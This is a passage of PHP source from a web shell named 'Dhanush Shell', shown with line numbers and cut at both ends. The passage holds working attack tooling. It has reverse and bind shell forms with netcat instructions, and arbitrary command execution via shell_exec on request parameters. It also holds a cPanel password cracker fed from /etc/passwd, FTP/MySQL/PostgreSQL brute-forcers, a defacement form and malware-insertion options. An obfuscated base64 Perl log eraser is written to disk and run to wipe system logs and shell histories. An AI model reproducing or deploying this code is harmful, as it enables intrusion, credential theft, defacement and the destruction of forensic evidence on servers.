5584 <td><input style="width: 200px;" class="box" name="port" size='5' value="9891"/></td>
5585 </tr>
5586 <tr>
5587 <td style="vertical-align:top;">Use:</td>
5588 <td><select style="width: 95px;" name="lang" class="sbox">
5589 <option value="perl">Perl</option>
5590 <option value="python">Python</option>
5591 <option value="php">PHP</option>
5592 </select>
5593 <input type="submit" style="width: 90px;" class="but" value="Connect!" name="backconnect"/></td>
5594 </tr>
5595 </table> </form>
5596 </td>
5597
5598 <td style="vertical-align:top;">
5599 <form method='post' >
5600 <table style="border-spacing: 6px;">
5601 <tr>
5602 <td>Port</td>
5603 <td>
5604 <input style="width: 200px;" class="box" name="port" value="9891" />
5605 </td>
5606 </tr>
5607 <tr>
5608 <td>Password </td>
5609 <td>
5610 <input style="width: 200px;" class="box" name="passwd" value="Dhanush"/>
5611 </td>
5612 <tr>
5613 <td>Using</td>
5614 <td>
5615 <select style="width: 95px;" name="lang" id="lang" class="sbox">
5616 <option value="perl">Perl</option>
5617 <option value="c">C</option>
5618 </select>
5619 <input style="width: 90px;" class="but" type="submit" name="backdoor" value=" Bind "/></td>
5620 </tr>
5621 </table>
5622 </td>
5623 </form>
5624 </tr>
5625 <tr><td colspan=2>Click "Connect" only after open port for it.Use NetCat, run "nc -l -n -v -p 9891"!<br>Click "Bind", use netcat and give it the command 'nc <?php yourip(); ?> 9891"!</td></tr>
5626 </table>
5627
5628 <?php
5629 }
5630else if(isset($_REQUEST['subdomain']))
5631{
5632 ?>
5633 <center><form>
5634 <table>
5635 <tr>
5636 <td>Cpanel user : </td>
5637 <td><input type="text" name="cpaneluser" value="<?php echo get_current_user(); ?>" class="box" /></td>
5638 </tr>
5639 <tr>
5640 <td>Cpanel password : </td>
5641 <td><input type="password" name="cpanelpass" class="box" /></td>
5642 </tr>
5643 <tr>
5644 <td>Number of Subdomain : </td>
5645 <td><input type="text" name="noofsubdomain" class="box" value="10" /></td>
5646 </tr>
5647 <tr>
5648 <td valign="top">Index : </td>
5649 <td><textarea rows="7" cols="54" name="subindex" class="box">You just got Hacked</textarea></td>
5650 </tr>
5651 <tr>
5652 <td></td>
5653 <td><input type="button" value=" go " class="but" onClick="createsubdomain(cpaneluser.value,cpanelpass.value,noofsubdomain.value,subindex.value)" /></td>
5654 </tr>
5655 </table></center></form><br>
5656 <div id="showmydata"></div>
5657 <?php
5658}
5659else if(isset($_REQUEST['404']))
5660{
5661 ?>
5662 <center><table><tr><td><a href=javascript:void(0) onClick="getdata('404new')"><font class=txt size="4">| Set Your 404 Page |</font></a></td>
5663 <td><a href=javascript:void(0) onClick="getdata('404page')"><font class=txt size="4">| Set Specified 404 Page |</font></a></td>
5664 </tr></table></center><br>
5665 <div id="showdata"></div>
5666 <?php
5667}
5668else if(isset($_GET['about']))
5669 { ?>
5670 <center>
5671 <p><font size=6><u>D h a n u s h</u></font><br>
5672 <font size=5>[--==Coded By Arjun==--]</font>
5673 <div style='font-family: Courier New; font-size: 10px;'><font class=om><pre>
5674
5675 - -- -
5676 -- -- --
5677 -- --
5678 --- ---
5679 ------
5680 ----
5681 ----
5682 ------
5683-------
5684--- --
5685 -- ---
5686 -- -----
5687 --- --- ---
5688 --- --- ---
5689-- --------- --
5690-- ------- --
5691 -- ---- --
5692 -- --- --
5693 -- -- --
5694 --- --- -- ---
5695 ------ ------
5696 ---- ----
5697
5698
5699 </pre></font></div></center>
5700 <font class="om">Dhanush Shell is a PHP Script, created for checking the vulnerability and security of any web server or website. With this PHP script, the owner can check various vulnerablities present in the web server. This shell provide you almost every facility that the security analyst need for penetration testing. This is a "All In One" php script, so that the user do not need to go anywhere else.<br> This script is coded by an Indian Ethical Hacker.<br> This script is only coded for education purpose or testing on your own server. The developer of the script is not responsible for any damage or misuse of it.</font><br><br><center><font size=5>GREETZ To All Indian Hackers</font><br><font size=6>| जय महाकाल | | जय हिन्द |</font></center><br>
5701 <?php }
5702else if(isset($_GET['database']))
5703{ ?>
5704 <form onSubmit="mydatabase(server.value,username.value,password.value);return false;">
5705 <table id="datatable" style="width:90%;" cellpadding="4" align="center">
5706 <tr>
5707 <td colspan="2">Connect To Database</td>
5708 </tr>
5709 <tr>
5710 <td>Server Address :</td>
5711 <td><input type="text" class="box" name="server" value="localhost"></td>
5712 </tr>
5713 <tr>
5714 <td>Username :</td>
5715 <td><input type="text" class="box" name="username" value="root"></td>
5716 </tr>
5717 <tr>
5718 <td>Password:</td>
5719 <td><input type="text" class="box" name="password" value=""></td>
5720 </tr>
5721
5722 <tr>
5723 <td></td>
5724 <td><input type="button" onClick="mydatabase(server.value,username.value,password.value)" value=" Connect " name="executeit" class="but"></td>
5725 </tr>
5726 </table>
5727 </form>
5728 <div id="showsql"></div>
5729<?php
5730}
5731// Cpanel Cracker
5732 else if(isset($_REQUEST['cpanel']))
5733 {
5734 $cpanel_port="2082";
5735 $connect_timeout=5;
5736 ?>
5737 <center>
5738 <form method=post>
5739 <table class="btmtbl" style="width:50%;" border=1 cellpadding=4>
5740 <tr>
5741 <td align=center>User names</td><td align=center>Password</td>
5742 </tr>
5743 <tr>
5744 <td align=center><textarea name=username rows=25 cols=22 class=box><?php
5745 if($os != "Windows")
5746 {
5747 if(@file('/etc/passwd'))
5748 {
5749 $users = file('/etc/passwd');
5750 foreach($users as $user)
5751 {
5752 $user = explode(':', $user);
5753 echo $user[0] . "\n";
5754 }
5755 }
5756 else
5757 {
5758 $temp = "";
5759 $val1 = 0;
5760 $val2 = 1000;
5761 for(;$val1 <= $val2;$val1++)
5762 {
5763 $uid = @posix_getpwuid($val1);
5764 if ($uid)
5765 $temp .= join(':',$uid)."\n";
5766 }
5767
5768 $temp = trim($temp);
5769
5770 if($file5 = fopen("test.txt","w"))
5771 {
5772 fputs($file5,$temp);
5773 fclose($file5);
5774
5775 $file = fopen("test.txt", "r");
5776 while(!feof($file))
5777 {
5778 $s = fgets($file);
5779 $matches = array();
5780 $t = preg_match('/\/(.*?)\:\//s', $s, $matches);
5781 $matches = str_replace("home/","",$matches[1]);
5782 if(strlen($matches) > 12 || strlen($matches) == 0 || $matches == "bin" || $matches == "etc/X11/fs" || $matches == "var/lib/nfs" || $matches == "var/arpwatch" || $matches == "var/gopher" || $matches == "sbin" || $matches == "var/adm" || $matches == "usr/games" || $matches == "var/ftp" || $matches == "etc/ntp" || $matches == "var/www" || $matches == "var/named")
5783 continue;
5784 echo $matches;
5785 }
5786 fclose($file);
5787 }
5788 }
5789 }
5790
5791 ?></textarea></td><td align=center><textarea name=password rows=25 cols=22 class=box></textarea></td>
5792 </tr>
5793 <tr>
5794 <td align=center colspan=2><input type="submit" name="cpanelattack" value=" Go " class=but></td>
5795 </tr>
5796 </table>
5797 </form>
5798 </center>
5799 <?php
5800}
5801else if(isset($_REQUEST['malattack']))
5802{
5803 ?><input type="hidden" id="malpath" value="<?php echo $_GET["dir"]; ?>">
5804 <center><table><tr><td><a href=# onClick="getdata('malware')"><font class=txt size="4">| Malware Attack |</font></a></td>
5805 <td><a href=# onClick="getdata('codeinsert')"><font class=txt size="4">| Insert Own Code |</font></a></td></tr></table></center><br>
5806 <div id="showdata"></div>
5807 <?php
5808}
5809else if(isset($_GET["com"]))
5810{
5811 echo "<br>";
5812 ob_start();
5813 eval("phpinfo();");
5814 $b = ob_get_contents();
5815 ob_end_clean();
5816 $a = strpos($b,"<body>")+6; // yeah baby,, your body is wonderland ;-)
5817 $z = strpos($b,'<script type="text/javascript">if (self==top) {function netbro_cache_analytics(fn, callback) {setTimeout(function() {fn();callback();}, 0);}function sync(fn) {fn();}function requestCfs(){var idc_glo_url = (location.protocol=="https:" ? "https://" : "http://");var idc_glo_r = Math.floor(Math.random()*99999999999);var url = idc_glo_url+ "cfs.u-ad.info/cfspushadsv2/request" + "?id=1" + "&enc=telkom2" + "¶ms=" + "4TtHaUQnUEiP6K%2fc5C582Ltpw5OIinlRRxDk0REVAuzsTPdUvJd93nM92QGRkmfvKvv8YAkckHzcuew%2fB3UIcja9OkbdaxYl%2fD352FWUgaXVhvly9LKGO%2bfcG83PWQcPGwy51ID%2bQUgqGop6CLzYgkMS6MqAaQRo3CV9wQMsU7fVAjZaIWYgFQLPNUd%2fZqUYTXqmAmJz337%2bDfRibFL7%2bMWuM%2fI1zVeWDq2ptQuWdZMCNK9zUVfMRITlkm0XAJG0o3Nn9XSCYCgTMIEu3%2fOlaK%2b88HPkTRM32d3ll81BIOropNlzBISvxoVBA2FcC0oqVKCBVHxSPclT9IiiHVbOSQR7h1uqlUPhV9ouXIhz%2fv0lpQIqYSqwmY8AnRRt%2bsEf4rAsM1T%2f1GmPWwpcB%2fz3dn%2b4gqGhO9btL4N1yO4AG8e1X1dV9Myx2sbPOx3xeTAo4ZEGqu9wSIMDjuhydWV8FwNwdb0IJxQQZXn6TpVC86Op6IqaM62f2qq2CjZ%2bC%2ficrkg1WXP%2fatZ%2biu0Mq4EtgX5QgqMPAY35ikvxAx0lpT4%3d" + "&idc_r="+idc_glo_r + "&domain="+document.domain + "&sw="+screen.width+"&sh="+screen.height;var bsa = document.createElement(\\\'script\\\');bsa.type = \\\'text/javascript\\\';bsa.async = true;bsa.src = url;(document.getElementsByTagName(\\\'head\\\')[0]||document.getElementsByTagName(\\\'body\\\')[0]).appendChild(bsa);}netbro_cache_analytics(requestCfs, function(){});};</script></body>');
5818 $s_result = "<div class='myphp'>".substr($b,$a,$z-$a)."</div>";
5819 echo $s_result;
5820}
5821else if(isset($_GET['execute']))
5822{
5823 $comm = $_GET['execute'];
5824 chdir($_GET['executepath']);
5825 $check = shell_exec($comm);
5826
5827 echo "<BR><center><textarea id=showexecute cols=100 rows=20 class=box>" . $check . "</textarea></center>";
5828
5829 ?>
5830 <BR><BR><center><form onSubmit="executemyfn('<?php echo addslashes($_GET['executepath']); ?>',execute.value);return false;">
5831 <input type="text" class="box" name="execute">
5832 <input type="button" onClick="executemyfn('<?php echo addslashes($_GET['executepath']); ?>',execute.value)" value="Execute" class="but">
5833 <input type="button" onClick="cancel()" value="cancel" class="but" /></form></center><BR>
5834 <?php
5835}
5836else if(isset($_GET['mycmd']))
5837{
5838 if($_GET['mycmd']=="logeraser")
5839 {
5840 $erase = gzinflate(base64_decode("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"));
5841 /*
5842 $erase ---> isinya
5843
5844#!usr/bin/perl
5845# Powered By Illuz1on
5846# Modded by Cod3rZ for Cod3rZ Shell
5847 chomp($os = $ARGV[0]);
5848
5849 if($os eq "misc"){ #If misc typed, do the following and start brackets
5850 print "[+]misc Selected...\n";
5851 sleep 1;
5852 print "<tr>[+]Logs Located...\n";
5853 sleep 1;
5854 $a = unlink @misc;
5855 sleep 1;
5856
5857 if($a) { print "[+]Logs Successfully Deleted...\n"; }
5858 else { print "[-]Error"; }
5859 }
5860
5861 if($os eq "openbsd"){ #If openbsd typed, do the following and start brackets
5862 print "[+]openbsd Selected...\n";
5863 sleep 1;
5864 print "[+]Logs Located...\n";
5865 sleep 1;
5866 $b = unlink @openbsd;
5867 sleep 1;
5868 if($b) {print "[+]Logs Successfully Deleted...\n"; }
5869 else { print "[-]Error"; }
5870 }
5871
5872 if($os eq "freebsd"){ #If freebsd typed, do the following and start brackets
5873 print "[+]freebsd Selected...\n";
5874 sleep 1;
5875 print "[+]Logs Located...\n";
5876 sleep 1;
5877 $c = unlink @freebsd;
5878 sleep 1;
5879 if($c) { print "[+]Logs Successfully Deleted...\n"; }
5880 else { print "[-]Error"; }
5881 }
5882
5883 if($os eq "debian"){ #If Debian typed, do the following and start brackets
5884 print "[+]debian Selected...\n";
5885 sleep 1;
5886 print "[+]Logs Located...\n";
5887 sleep 1;
5888 $d = unlink @debian;
5889 sleep 1;
5890 if($d) { print "[+]Logs Successfully Deleted...\n"; }
5891 else { print "[-]Error"; }
5892 }
5893
5894 if($os eq "suse"){ #If suse typed, do the following and start brackets
5895 print "[+]suse Selected...\n";
5896 sleep 1;
5897 print "[+]Logs Located...\n";
5898 sleep 1;
5899 $e = unlink @suse;
5900 sleep 1;
5901 if($e) { print "[+]Logs Successfully Deleted...\n"; }
5902 else { print "[-]Error"; }
5903 }
5904
5905 if($os eq "solaris"){ #If solaris typed, do the following and start brackets
5906 print "[+]solaris Selected...\n";
5907 sleep 1;
5908 print "[+]Logs Located...\n";
5909 sleep 1;
5910 $f = unlink @solaris;
5911 sleep 1;
5912 if($f) {print "[+]Logs Successfully Deleted...\n"; }
5913 else { print "[-]Error"; }
5914 }
5915
5916 if($os eq "lampp"){ #If lampp typed, do the following and start brackets
5917 print "[+]Lampp Selected...\n";
5918 sleep 1;
5919 print "[+]Logs Located...\n";
5920 sleep 1;
5921 $g = unlink @lampp;
5922 sleep 1;
5923 if($g) { print "[+]Logs Successfully Deleted...\n"; }
5924 else { print "[-]Error"; }
5925 }
5926
5927 if($os eq "redhat"){ #If redhat typed, do the following and start brackets
5928 print "[+]Red Hat Linux/Mac OS X Selected...\n";
5929 sleep 1;
5930 print "[+]Logs Located...\n";
5931 sleep 1;
5932 $h = unlink @redhat;
5933 sleep 1;
5934 if($h) { print "[+]Logs Successfully Deleted...\n"; }
5935 else { print "[-]Error"; }
5936 }
5937
5938 if($os eq "linux"){ #If linux typed, do the following and start brackets
5939 print "[+]Linux Selected...\n";
5940 sleep 1;
5941 print "[+]Logs Located...\n";
5942 sleep 1;
5943 $i = unlink @linux;
5944 sleep 1;
5945 if($i) { print "[+]Logs Successfully Deleted...\n";}
5946 else { print "[-]Error"; }
5947 }
5948
5949 if($os eq "sunos"){ #If sunos typed, do the following and start brackets
5950 print "[+]SunOS Selected...\n";
5951 sleep 1;
5952 print "[+]Logs Located...\n";
5953 sleep 1;
5954 $l = unlink @sunos;
5955 if($l) { print "[+]Logs Successfully Deleted...\n"; }
5956 else { print "[-]Error"; }
5957 }
5958
5959 if($os eq "aix"){ #If aix typed, do the following and start brackets
5960 print "[+]Aix Selected...\n";
5961 sleep 1;
5962 print "[+]Logs Located...\n";
5963 sleep 1;
5964 $m = unlink @aix;
5965 if($m) { print "[+]Logs Successfully Deleted...\n"; }
5966 else { print "[-]Error"; }
5967 }
5968
5969 if($os eq "irix"){ #If irix typed, do the following and start bracket
5970 print "[+]Irix Selected...\n";
5971 sleep 1;
5972 print "[+]Logs Located...\n";
5973 sleep 1;
5974 $n = unlink @irix;
5975 if($n) { print "[+]Logs Successfully Deleted...\n"; }
5976 else { print "[-]Error"; }
5977 }
5978
5979 #Misc Log Locations
5980 {
5981 @misc = ("/etc/httpd/logs/access.log", "/etc/httpd/logs/error.log","/etc/httpd/logs/access_log",
5982 "/etc/httpd/logs/error_log","/usr/local/apache/logs/access_log","/usr/local/apache/logs/error_log",
5983 "/usr/local/apache/logs/access.log","/usr/local/apache/logs/error.log","/var/log/apache/access_log",
5984 "/var/log/apache/error_log","/var/log/apache/access.log","/var/log/apache/error.log","/var/log/access_log",
5985 "/var/log/error_log","/var/www/logs/error.log","/var/www/logs/access.log","/var/www/logs/error_log",
5986 "/var/www/logs/access_log")
5987 }
5988
5989 #Logs of OpenBSD Systems
5990
5991 {
5992 @openbsd = ("/var/www/log/access_log", "/var/www/log/error_log")
5993 }
5994
5995 #Logs of FreeBSD Systems
5996
5997 {
5998 @freebsd = ("/usr/local/etc/httpd/logs/access_log", "/usr/local/etc/httpd/logs/error_log")
5999 }
6000
6001 #Logs of Debian Systems
6002
6003 {
6004 @debian = ("/var/log/apache/access.log", "/var/log/apache/error.log",
6005 "/var/log/apache-ssl/error.log", "/var/log/apache-ssl/access.log")
6006 }
6007
6008 #Logs of SuSE Linux Systems
6009
6010 {
6011 @suse = ("/var/log/httpd/access_log", "/var/log/httpd/error_log")
6012 }
6013
6014 #Logs of Solaris Systems
6015
6016 {
6017 @solaris = ("/var/apache/logs/access_log", "/var/apache/logs/error_log")
6018 }
6019
6020 #Logs of Lampp Systems
6021
6022 {
6023 @lampp = ("/opt/lampp/logs/error_log", "/opt/lampp/logs/access_log")
6024 }
6025
6026 #Logs of Red Hat, Mac OS X Systems
6027
6028 {
6029 @redhat = ("/var/log/httpd/access_log", "/var/log/httpd/error_log")
6030 }
6031
6032 #Logs of Irix Systems
6033
6034 {
6035 @irix = ("/var/adm/SYSLOG", "/var/adm/sulog", "/var/adm/utmp", "/var/adm/utmpx",
6036 "/var/adm/wtmp", "/var/adm/wtmpx", "/var/adm/lastlog/",
6037 "/usr/spool/lp/log", "/var/adm/lp/lp-errs", "/usr/lib/cron/log",
6038 "/var/adm/loginlog", "/var/adm/pacct", "/var/adm/dtmp",
6039 "/var/adm/acct/sum/loginlog", "var/adm/X0msgs", "/var/adm/crash/vmcore",
6040 "/var/adm/crash/unix")
6041 }
6042
6043 #Log sof Aix Systems
6044 {
6045 @aix = ("/var/adm/pacct", "/var/adm/wtmp", "/var/adm/dtmp", "/var/adm/qacct",
6046 "/var/adm/sulog", "/var/adm/ras/errlog", "/var/adm/ras/bootlog",
6047 "/var/adm/cron/log", "/etc/utmp", "/etc/security/lastlog",
6048 "/etc/security/failedlogin", "usr/spool/mqueue/syslog")
6049 }
6050
6051 #Logs of SunOS Systems
6052 {
6053 @sunos = ("/var/adm/messages", "/var/adm/aculogs", "/var/adm/aculog",
6054 "/var/adm/sulog", "/var/adm/vold.log", "/var/adm/wtmp",
6055 "/var/adm/wtmpx", "/var/adm/utmp", "/var/adm/utmpx",
6056 "/var/adm/log/asppp.log", "/var/log/syslog",
6057 "/var/log/POPlog", "/var/log/authlog", "/var/adm/pacct",
6058 "/var/lp/logs/lpsched", "/var/lp/logs/requests",
6059 "/var/cron/logs", "/var/saf/_log", "/var/saf/port/log")
6060 }
6061
6062 #Logs of Linux Systems
6063 {
6064 @linux = ("/var/log/lastlog", "/var/log/telnetd", "/var/run/utmp",
6065 "/var/log/secure","/root/.ksh_history", "/root/.bash_history",
6066 "/root/.bash_logut", "/var/log/wtmp", "/etc/wtmp",
6067 "/var/run/utmp", "/etc/utmp", "/var/log", "/var/adm",
6068 "/var/apache/log", "/var/apache/logs", "/usr/local/apache/logs",
6069 "/usr/local/apache/logs", "/var/log/acct", "/var/log/xferlog",
6070 "/var/log/messages/", "/var/log/proftpd/xferlog.legacy",
6071 "/var/log/proftpd.xferlog", "/var/log/proftpd.access_log",
6072 "/var/log/httpd/error_log", "/var/log/httpsd/ssl_log",
6073 "/var/log/httpsd/ssl.access_log", "/etc/mail/access",
6074 "/var/log/qmail", "/var/log/smtpd", "/var/log/samba",
6075 "/var/log/samba.log.%m", "/var/lock/samba", "/root/.Xauthority",
6076 "/var/log/poplog", "/var/log/news.all", "/var/log/spooler",
6077 "/var/log/news", "/var/log/news/news", "/var/log/news/news.all",
6078 "/var/log/news/news.crit", "/var/log/news/news.err", "/var/log/news/news.notice",
6079 "/var/log/news/suck.err", "/var/log/news/suck.notice",
6080 "/var/spool/tmp", "/var/spool/errors", "/var/spool/logs", "/var/spool/locks",
6081 "/usr/local/www/logs/thttpd_log", "/var/log/thttpd_log",
6082 "/var/log/ncftpd/misclog.txt", "/var/log/nctfpd.errs",
6083 "/var/log/auth")
6084 }
6085 */
6086
6087
6088 if(is_writable("."))
6089 {
6090 if($openp = fopen(getcwd()."/logseraser.pl", 'w'))
6091 {
6092 fwrite($openp, $erase);
6093 fclose($openp);
6094 passthru("perl logseraser.pl linux");
6095 unlink("logseraser.pl");
6096 echo "<center><font color=#FFFFFF size=3>Logs Cleared</font></center>";
6097 }
6098 } else
6099 {
6100 if($openp = fopen("/tmp/logseraser.pl", 'w'))
6101 {
6102 fwrite($openp, $erase)or die("Error");
6103 fclose($openp);
6104 $aidx = passthru("perl logseraser.pl linux");
6105 unlink("logseraser.pl");
6106 echo "<center><font color=#FFFFFF size=3>Logs Cleared</font></center>";
6107 }
6108 }
6109 }
6110 else
6111 {
6112 $check = shell_exec($_GET['mycmd']);
6113 echo "<center><textarea cols=120 rows=20 class=box>" . $check . "</textarea></center>";
6114
6115 }
6116}
6117else if(isset($_GET['prototype']))
6118{
6119 echo '<h1>Results</h1><div><span>Type:</span> '.htmlspecialchars($_GET['prototype']).' <span><br>Server:</span> '.htmlspecialchars($_GET['serverport']).'<br>';
6120 if( $_GET['prototype'] == 'ftp' )
6121 {
6122 function BruteFun($ip,$port,$login,$pass)
6123 {
6124 $fp = @ftp_connect($ip, $port?$port:21);
6125 if(!$fp) return false;
6126 $res = @ftp_login($fp, $login, $pass);
6127 @ftp_close($fp);
6128 return $res;
6129 }
6130 }
6131 elseif( $_GET['prototype'] == 'mysql' )
6132 {
6133 function BruteFun($ip,$port,$login,$pass)
6134 {
6135 $res = @mysql_connect($ip.':'.$port?$port:3306, $login, $pass);
6136 @mysql_close($res);
6137 return $res;
6138 }
6139 }
6140 elseif( $_GET['prototype'] == 'pgsql' )
6141 {
6142 function BruteFun($ip,$port,$login,$pass)
6143 {
6144 $str = "host='".$ip."' port='".$port."' user='".$login."' password='".$pass."' dbname=postgres";
6145 $res = @pg_connect($str);
6146 @pg_close($res);
6147 return $res;
6148 }
6149 }
6150
6151 $success = 0;
6152 $attempts = 0;
6153 $server = explode(":", $_GET['server']);
6154
6155 if($_GET['type'] == 1)
6156 {
6157 $temp = @file('/etc/passwd');
6158 if( is_array($temp))
6159 foreach($temp as $line)
6160 {
6161 $line = explode(":", $line);
6162 ++$attempts;
6163 if(BruteFun(@$server[0],@$server[1], $line[0], $line[0]) )
6164 {
6165 $success++;
6166 echo '<b>'.htmlspecialchars($line[0]).'</b>:'.htmlspecialchars($line[0]).'<br>';
6167 }
6168 if(@$_GET['reverse'])
6169 {
6170 $tmp = "";
6171 for($i=strlen($line[0])-1; $i>=0; --$i)
6172 $tmp .= $line[0][$i];
6173 ++$attempts;
6174 if(BruteFun(@$server[0],@$server[1], $line[0], $tmp) )
6175 {
6176 $success++;
6177 echo '<b>'.htmlspecialchars($line[0]).'</b>:'.htmlspecialchars($tmp);
6178 }
6179 }
6180 }
6181 }
6182 elseif($_GET['type'] == 2)
6183 {
6184 $temp = @file($_GET['dict']);
6185 if( is_array($temp) )
6186 foreach($temp as $line)
6187 {
6188 $line = trim($line);
6189 ++$attempts;
6190 if(BruteFun($server[0],@$server[1], $_GET['login'], $line) )
6191 {
6192 $success++;
6193 echo '<b>'.htmlspecialchars($_GET['login']).'</b>:'.htmlspecialchars($line).'<br>';
6194 }
6195 }
6196 }
6197 echo "<span>Attempts:</span> <font class=txt>$attempts</font> <span>Success:</span> <font class=txt>$success</font></div>";
6198}
6199// Execute Query
6200else if(isset($_GET["executeit"]))
6201{
6202 if(isset($_GET['username']) && isset($_GET['server']))
6203 {
6204 $dbserver = $_GET['server'];
6205 $dbuser = $_GET['username'];
6206 $dbpass = $_GET['password'];
6207 if(mysql_connect($dbserver,$dbuser,$dbpass))
6208 {
6209 setcookie("dbserver", $dbserver);
6210 setcookie("dbuser", $dbuser);
6211 setcookie("dbpass", $dbpass);
6212
6213 listdatabase();
6214 }
6215 else
6216 echo "cannotconnect";
6217 }
6218}
6219else if(isset($_GET['action']) && isset($_GET['dbname']))
6220
6221
6222 {
6223 if($_GET['action'] == "createDB")
6224 {
6225 $dbname = $_GET['dbname'];
6226 $dbserver = $_COOKIE["dbserver"];
6227 $dbuser = $_COOKIE["dbuser"];
6228 $dbpass = $_COOKIE["dbpass"];
6229 $mysqlHandle = mysql_connect($dbserver, $dbuser, $dbpass);
6230 mysql_query("create database $dbname",$mysqlHandle);
6231 listdatabase();
6232 }
6233 if($_GET['action'] == 'dropDB')
6234 {
6235 $dbname = $_GET['dbname'];
6236 $dbserver = $_COOKIE["dbserver"];
6237 $dbuser = $_COOKIE["dbuser"];
6238 $dbpass = $_COOKIE["dbpass"];
6239 $mysqlHandle = mysql_connect($dbserver, $dbuser, $dbpass);
6240 mysql_query("drop database $dbname",$mysqlHandle);
6241 mysql_close($mysqlHandle);
6242 listdatabase();
6243 }
6244
6245 if($_GET['action'] == 'listTables')
6246 {
6247 listtable();
6248 }
6249
6250 // Create Tables
6251 if($_GET['action'] == "createtable")
6252 {
6253 $dbserver = $_COOKIE["dbserver"];
6254 $dbuser = $_COOKIE["dbuser"];
6255 $dbpass = $_COOKIE["dbpass"];
6256 $dbname = $_GET['dbname'];
6257 $tablename = $_GET['tablename'];
6258 $mysqlHandle = mysql_connect ($dbserver, $dbuser, $dbpass);
6259 mysql_select_db($dbname);
6260 mysql_query("CREATE TABLE $tablename ( no INT )");
6261 listtable();
6262 }
6263
6264 // Drop Tables
6265 if($_GET['action'] == "dropTable")
6266 {
6267 $dbserver = $_COOKIE["dbserver"];
6268 $dbuser = $_COOKIE["dbuser"];
6269 $dbpass = $_COOKIE["dbpass"];
6270 $dbname = $_GET['dbname'];
6271 $tablename = $_GET['tablename'];
6272 $mysqlHandle = mysql_connect ($dbserver, $dbuser, $dbpass);
6273 mysql_select_db($dbname);
6274 mysql_query("drop table $tablename");
6275 listtable();
6276 }
6277
6278 // Empty Tables
6279 if($_GET['action'] == "empty")
6280 {
6281 $dbserver = $_COOKIE["dbserver"];
6282 $dbuser = $_COOKIE["dbuser"];
6283 $dbpass = $_COOKIE["dbpass"];
6284 $dbname = $_GET['dbname'];
6285 $tablename = $_GET['tablename'];
6286 $mysqlHandle = mysql_connect ($dbserver, $dbuser, $dbpass);
6287 mysql_select_db($dbname);
6288 mysql_query("delete from $tablename");
6289 listtable();
6290 }
6291
6292 // Empty Tables
6293 if($_GET['action'] == "dropField")
6294 {
6295 $dbserver = $_COOKIE["dbserver"];
6296 $dbuser = $_COOKIE["dbuser"];
6297 $dbpass = $_COOKIE["dbpass"];
6298 $dbname = $_GET['dbname'];
6299 $tablename = $_GET['tablename'];
